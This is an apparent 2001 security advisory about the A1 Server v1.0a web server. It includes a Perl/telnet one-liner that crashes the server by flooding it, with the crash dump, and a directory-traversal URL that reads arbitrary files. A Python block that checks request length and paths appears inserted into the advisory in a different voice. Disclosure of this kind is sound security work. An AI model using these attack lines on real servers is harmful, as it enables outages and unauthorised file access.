From: slipyB10Z.NET
Date: Mon Feb 26 2001 - 22:53:54 CST


    Introduction:

    A1 Server v1.0a is an HTTP server for the Windows
    OS. It serves the following content types: GIF
    images, HTM or HTML pages, EXE files, and ZIP
    files. The server is very small, yet somewhat
    stable, and is freeware! (Yeah. right)

    The vendor's website is:
    http://msnhomepages.talkcity.com/windowsway/lriver2/a1server.htm

    Problem #1 : Denial of Service Attack

    A1 Server v1.0a is vulnerable to a nasty Denial of
    Service attack: it can be flooded with useless junk
    until the server crashes, which happens within seconds.
    Once it has crashed it must be restarted before it
    works again. All Windows versions appear to be
    affected.

    Example:

    echo `perl -e 'print "A" x 1000'` | telnet a1server 80

    ^^ = Will cause the program to quit within seconds
    and display:

    A1SERVER caused an invalid page fault in module
    A1SERVER.EXE at 016f:004101ae.
    Registers:
    EAX=00000000 CS=016f EIP=004101ae
    EFLGS=00010246 EBX=00420094 SS=0177
    ESP=006bfc70 EBP=006bfc78 ECX=ffffffff DS=0177
    ESI=00000001 FS=6417 EDX=004263b2 ES=0177
    EDI=00000001 GS=5e47 Bytes at CS:EIP:
    f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc
    Stack dump:
    004211a8 0000001c 006bfca8 004151db 004211a8
    00000001 006bfcb0 00008d20 006bfcfc bff7b796
    bffc9490 00000177 006bfcb8 bff7b828 006bfcc8
    bff7363b

    Problem #2 : Directory Traversal

    Adding the string "/../" to a URL allows an attacker to
    view any file on the server, provided the attacker
    already knows where the file is located.

    Example:

    http://www.a1server.win/../../../../../../Scandisk.log

    ^^ = Will obviously open the Scandisk.log file.
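Both problems come down to request input that the server never validates: an unbounded request line in Problem #1 and a URL path mapped straight onto the filesystem in Problem #2. As an added example (my own code, not A1 Server's), the following shows the checks a small HTTP server needs on that path before opening anything; the constants, the function name and the docroot are assumptions for illustration.

```python
import os
import posixpath
from urllib.parse import unquote

# Added example, not A1 Server code. The constants and names are assumptions.
MAX_REQUEST_LINE = 512          # cap on one request line; the flood is far longer
ALLOWED_SUFFIXES = (".gif", ".htm", ".html", ".exe", ".zip")  # what A1 Server serves


def resolve_request_path(docroot, request_line):
    """Map a raw HTTP request line to a file under docroot, or None if refused.

    Refuses over-long lines (Problem #1), any path containing a ".." segment
    after percent-decoding and slash normalisation (Problem #2), anything that
    still resolves outside docroot, and file types the server never meant to serve.
    """
    if len(request_line) > MAX_REQUEST_LINE or "\0" in request_line:
        return None
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return None
    # Strip the query string, decode %xx escapes, and treat "\" like "/" so
    # encoded or backslash variants of "/../" do not slip past the check.
    url_path = unquote(parts[1].split("?", 1)[0]).replace("\\", "/")
    if any(seg == ".." for seg in url_path.split("/")):
        return None
    normalised = posixpath.normpath("/" + url_path)
    if url_path.endswith("/") or normalised == "/":
        normalised = posixpath.join(normalised, "index.htm")
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, normalised.lstrip("/")))
    # Containment is checked on the resolved path, so a symlink under docroot
    # cannot point a request back outside it.
    if not candidate.startswith(root + os.sep):
        return None
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None
    return candidate
```

The ".." check runs on the decoded, slash-normalised path rather than on the raw URL, which is what makes the "%2e%2e" and backslash spellings of the traversal fail along with the plain one.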

    Vendor has been notified. No e-mail reply yet.

    --------------------
    b10z HTTPd Advisory
    slipyb10z.net

    Found: February 26th, 2001.